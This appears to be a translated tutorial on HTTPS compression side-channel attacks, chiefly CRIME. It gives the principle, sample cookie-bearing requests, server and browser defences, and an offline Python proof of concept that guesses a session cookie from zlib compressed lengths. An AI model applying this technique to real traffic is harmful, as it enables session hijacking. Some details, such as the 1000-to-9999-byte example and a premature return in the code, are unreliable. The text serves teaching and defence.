Common HTTPS attack methods (1)

Source: Internet
Author: User

Common HTTPS attack methods (1)

0x00 background

Study common https attack methods

Beast crime breach, and puts forward some suggestions for secure deployment of https Based on https features.

HTTPS attacks are mostly used in man-in-the-middle attacks. They are mainly used to perform side-channel-attack Based on the compression algorithm used by HTTPS and the CBC encryption mode. The prerequisites for these attacks are harsh, and the victim host must submit many requests to collect sufficient information to decrypt key data.

Common attack methods include BEAST, Lucky-13, RC4 Biases, CRIME, TIME, and BREACH. This section mainly introduces several of them.

0x01 CRIME

Compression Ratio Info-leak Made Easy

Attack principles

Attackers control the victim to send a large number of requests, use the compression algorithm to guess the key information in the request, and determine whether the request is successful based on the response length.

The following is the https header, which can be controlled by the get request address and Cookie. Then, the attacker only needs to constantly change the guess string at the GET address to guess.

GET /sessionid=a HTTP/1.1
Host: bank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0)
Gecko/20100101 Firefox/16.0
Cookie: sessionid=d3b0c44298fc1c149afbf4c8996fb924

GET /sessionid=a HTTP/1.1
Host: bank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0)
Gecko/20100101 Firefox/16.0
Cookie: sessionid=d3b0c44298fc1c149afbf4c8996fb924

For example, the Response length is 1000 bytes.

GET /sessionid=d HTTP/1.1
Host: bank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0)
Gecko/20100101 Firefox/16.0
Cookie: sessionid=d3b0c44298fc1c149afbf4c8996fb924

When an attacker guesses the first letter of the cookie, the Response length will be reduced to 9999 bytes.

After the Response is encrypted by SSL, if the RC4 encryption mode is used, the length does not change randomly. When the BCB encryption mode is used, the length may slightly change due to padding.

Affected encryption algorithms

Deflate = LZ77 + HuffManGZip = Headers + Data Compressed using Deflate

Attack prerequisites

Attackers can obtain the victim's network communication package. (Man-in-the-middle attack, ISP supplier)

Browsers and servers support and use compression algorithms.

Attacks can control the victim to send a large number of requests and control the request content.

Defense methods

The client can upgrade the browser to avoid such attacks.

▪ Chrome: 21.0.1180.89 and above
▪ Firefox: 15.0.1 and above
▪ Opera: 12.01 and above
▪ Safari: 5.1.7 and above

The server can disable encryption algorithms to prevent such attacks.

Apache• SSLCompression flag = “SSLCompression off”• GnuTLSPriorities flag = “!COMP-DEFLATE"

Prohibit requests that are too frequent.

Modify the compression algorithm flow. user input data is not compressed.

Randomly add undefined junk data.

TLS 1.0.
SPDY protocol (Google).
Applications that uses TLS compression.
Mozilla Firefox (older versions) that support SPDY.
Google Chrome (older versions) that supported both TLS and SPDY.

POC

This poc does not simulate man-in-the-middle attacks in real environments, but verifies the feasibility of the attacks by using CRIME in python.

 
 
  1. import string  
  2. import zlib  
  3. import sys  
  4. import random  
  5.     
  6. charset = string.letters + string.digits  
  7.     
  8. COOKIE = ''.join(random.choice(charset) for x in range(30))  
  9.     
  10. HEADERS = ("POST / HTTP/1.1\r\n" 
  11.            "Host: thebankserver.com\r\n" 
  12.            "Connection: keep-alive\r\n" 
  13.            "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n" 
  14.            "Accept: */*\r\n" 
  15.            "Referer: https://thebankserver.com/\r\n" 
  16.            "Cookie: secret="+COOKIE+"\r\n" 
  17.            "Accept-Encoding: gzip,deflate,sdch\r\n" 
  18.            "Accept-Language: en-US,en;q=0.8\r\n" 
  19.            "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n" 
  20.            "\r\n")  
  21. BODY =    ("POST / HTTP/1.1\r\n" 
  22.            "Host: thebankserver.com\r\n" 
  23.            "Connection: keep-alive\r\n" 
  24.            "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n" 
  25.            "Accept: */*\r\n" 
  26.            "Referer: https://thebankserver.com/\r\n" 
  27.            "Cookie: secret=")  
  28. cookie = ""  
  29.     
  30. def compress(data):  
  31.     
  32.     c = zlib.compressobj()  
  33.     return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)  
  34. def getposset(perchar,chars):  
  35.     posset = []  
  36.     baselen = len(compress(HEADERS+perchar))  
  37.     for i in chars:  
  38.         t = len(compress(HEADERS+ perchar+i))  
  39.         if (t<=baselen):  
  40.             posset += i  
  41.     return posset  
  42. def doguess():  
  43.     global cookie  
  44.     while len(cookie)<30:  
  45.         posset = getposset(BODY+cookie,charset)  
  46.         trun = 1 
  47.         tem_posset = posset  
  48.         while 1<len(posset):  
  49.             tem_body = BODY[trun:]  
  50.             posset = getposset(tem_body+cookie,tem_posset)  
  51.             trun = trun +1 
  52.         if len(posset)==0:  
  53.             return False 
  54.         cookie += posset[0]  
  55.         print posset[0]  
  56.         return True 
  57.     
  58. while BODY.find("\r\n")>=0:  
  59.     if not doguess():  
  60.         print "(-)Changebody" 
  61.         BODY = BODY[BODY.find("\r\n") + 2:]  
  62. print "(+)orign  cookie"+COOKIE  
  63. print "(+)Gotten cookie"+cookie 


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.